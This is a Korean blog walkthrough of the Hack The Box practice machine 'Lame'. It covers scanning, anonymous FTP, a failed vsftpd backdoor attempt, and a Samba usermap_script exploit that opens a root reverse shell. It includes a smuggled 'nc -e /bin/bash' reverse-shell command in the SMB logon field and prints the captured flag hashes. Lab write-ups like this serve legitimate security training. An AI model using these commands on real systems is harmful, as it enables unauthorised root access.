ping test
┌──(root💀takudaddy)-[~]
└─# ping 10.10.14.13 (HOST)
PING 10.10.14.13 (10.10.14.13) 56(84) bytes of data.
64 bytes from 10.10.14.13: icmp_seq=1 ttl=64 time=0.029 ms
64 bytes from 10.10.14.13: icmp_seq=2 ttl=64 time=0.023 ms
^C
--- 10.10.14.13 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1023ms
rtt min/avg/max/mdev = 0.023/0.026/0.029/0.003 ms
┌──(root💀takudaddy)-[~]
└─# ping 10.10.10.3 (CLIENT)
PING 10.10.10.3 (10.10.10.3) 56(84) bytes of data.
64 bytes from 10.10.10.3: icmp_seq=1 ttl=63 time=206 ms
64 bytes from 10.10.10.3: icmp_seq=2 ttl=63 time=206 ms
^C
--- 10.10.10.3 ping statistics ---
2 packets transmitted, 2 received, 0% packet loss, time 1000ms
rtt min/avg/max/mdev = 205.784/205.872/205.960/0.088 ms
SCANNING
┌──(root💀takudaddy)-[/htb/Lame]
└─# nmap -p- 10.10.10.3 130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-17 21:38 KST
Nmap scan report for 10.10.10.3
Host is up (0.21s latency).
Not shown: 65530 filtered ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3632/tcp open distccd
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 10.10.14.13
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
| 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 2h05m06s, deviation: 2h49m45s, median: 5m03s
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2021-04-17T08:42:29-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)
vsftpd 2.3.4
smbd 3.0.20
ftp anonymous login
┌──(root💀takudaddy)-[~]
└─# ftp 10.10.10.3
Connected to 10.10.10.3.
220 (vsFTPd 2.3.4)
Name (10.10.10.3:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 .
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 ..
226 Directory send OK.
ftp> ls -alhR
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
.:
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 .
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 ..
226 Directory send OK.
ftp> cd .
250 Directory successfully changed.
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 .
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 ..
226 Directory send OK.
ftp> cd ..
250 Directory successfully changed.
ftp> ls -al
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 .
drwxr-xr-x 2 0 65534 4096 Mar 17 2010 ..
vsftpd 2.3.4
┌──(root💀takudaddy)-[/htb/Lame]
└─# searchsploit vsftpd 2.3 127 ⨯
-------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------- ---------------------------------
vsftpd 2.3.2 - Denial of Service | linux/dos/16270.c
vsftpd 2.3.4 - Backdoor Command Execution (Metasp | unix/remote/17491.rb
-------------------------------------------------- ---------------------------------
┌──(root💀takudaddy)-[/htb/Lame]
└─# searchsploit -m unix/remote/17491.rb
Exploit: vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)
URL: https://www.exploit-db.com/exploits/17491
Path: /usr/share/exploitdb/exploits/unix/remote/17491.rb
File Type: Ruby script, ASCII text, with CRLF line terminators
Copied to: /htb/Lame/17491.rb
┌──(root💀takudaddy)-[/htb/Lame]
└─# cat 17491.rb
##
# $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
.....
┌──(root💀takudaddy)-[/htb/Lame]
└─# msfconsole -q
msf6 > search vsftpd 2.3.4
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/unix/ftp/vsftpd_234_backdoor 2011-07-03 excellent No VSFTPD v2.3.4 Backdoor Command Execution
Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 cmd/unix/interact normal No Unix Command, Interact with Established Connection
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 21 yes The target port (TCP)
Payload options (cmd/unix/interact):
Name Current Setting Required Description
---- --------------- -------- -----------
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 10.10.10.3:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.3:21 - USER: 331 Please specify the password.
anonymous
[*] Exploit completed, but no session was created.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > anonymous
[-] Unknown command: anonymous.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > back
msf6 > exit
smbmap / enum4linux / smbclient
┌──(root💀takudaddy)-[~]
└─# smbmap -H 10.10.10.3
[+] IP: 10.10.10.3:445 Name: 10.10.10.3
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
tmp READ, WRITE oh noes!
opt NO ACCESS
IPC$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ NO ACCESS IPC Service (lame server (Samba 3.0.20-Debian))
┌──(root💀takudaddy)-[/htb]
└─# smbclient -L //10.10.10.3 1 ⨯
protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED
1 ⨯
┌──(root💀takudaddy)-[/htb]
└─# smbclient //10.10.10.3/tmp 1 ⨯
protocol negotiation failed: NT_STATUS_CONNECTION_DISCONNECTED
# smbclient //10.10.10.3/tmp
접속 가능 했다면
smb > ls
'logon' 명령어를 쓸 수 있으면
smb > logon "./=`nohup nc -e /bin/bash 10.10.14.13 7979`"
리스너 열면 접속 됨.
smbd 3.0.20
┌──(root💀takudaddy)-[/htb/Lame]
└─# searchsploit 3.0.20
-------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------- ---------------------------------
CubeCart 3.0.20 - '/admin/login.php?goto' Arbitra | php/webapps/36686.txt
CubeCart 3.0.20 - 'switch.php?r' Arbitrary Site R | php/webapps/36687.txt
CubeCart 3.0.20 - Multiple Script 'redir' Arbitra | php/webapps/36685.txt
Maxthon Browser 3.0.20.1000 - ref / replace Denia | windows/dos/16084.html
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' | unix/remote/16320.rb
Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt
Spy Emergency 23.0.205 - Unquoted Service Path Pr | windows/local/40550.txt
-------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(root💀takudaddy)-[/htb/Lame]
└─# searchsploit -m unix/remote/16320.rb
Exploit: Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)
URL: https://www.exploit-db.com/exploits/16320
Path: /usr/share/exploitdb/exploits/unix/remote/16320.rb
File Type: Ruby script, ASCII text, with CRLF line terminators
Copied to: /htb/Lame/16320.rb
┌──(root💀takudaddy)-[/htb/Lame]
└─# cat 16320.rb
##
# $Id: usermap_script.rb 10040 2010-08-18 17:24:46Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
┌──(root💀takudaddy)-[/htb/Lame]
└─# msfconsole -q
msf6 > search 3.0.20
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/admin/http/wp_easycart_privilege_escalation 2015-02-25 normal Yes WordPress WP EasyCart Plugin Privilege Escalation
1 exploit/multi/samba/usermap_script 2007-05-14 excellent No Samba "username map script" Command Execution
Interact with a module by name or index. For example info 1, use 1 or use exploit/multi/samba/usermap_script
msf6 > use exploit/multi/samba/usermap_script
........
msf6 exploit(multi/samba/usermap_script) > set RHOSTS 10.10.10.3
RHOSTS => 10.10.10.3
msf6 exploit(multi/samba/usermap_script) > set LHOST 10.10.14.13
LHOST => 10.10.14.13
msf6 exploit(multi/samba/usermap_script) > set LPORT 7979
LPORT => 7979
msf6 exploit(multi/samba/usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 10.10.10.3 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 139 yes The target port (TCP)
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.14.13 yes The listen address (an interface may be specified)
LPORT 7979 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(multi/samba/usermap_script) > run
[*] Started reverse TCP handler on 10.10.14.13:7979
[*] Command shell session 1 opened (10.10.14.13:7979 -> 10.10.10.3:41056) at 2021-04-17 22:14:12 +0900
id
uid=0(root) gid=0(root)
shell
[*] Trying to find binary(python) on target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell
[*] Trying to find binary(bash) on target machine
[*] Found bash at /bin/bash
id
id
uid=0(root) gid=0(root)
root@lame:/root# cd /home
cls
d /home
root@lame:/home# ls
ftp makis service user
root@lame:/home# cd makis
cd makis
root@lame:/home/makis# ls
ls
user.txt
root@lame:/home/makis# cat user.txt
cat user.txt
0f9c24478ff494f0c5e24665a28fba8d
root@lame:/# cd /root
cd /root
root@lame:/root# ls
ls
Desktop reset_logs.sh root.txt vnc.log
root@lame:/root# cat root.txt
cat root.txt
8c522e63645e5004a52c2870941456bf
끝
728x90
'OSCP > HacktheBox' 카테고리의 다른 글
| 4. Shocker (0) | 2021.04.19 |
|---|---|
| 3. Popcorn (0) | 2021.04.18 |
| 1. Time (0) | 2021.04.16 |
| Hack The Box VPN 및 박스 사용법 (2) | 2021.04.16 |
| OSCP 시험과 비슷한 Box 리스트 (0) | 2021.04.16 |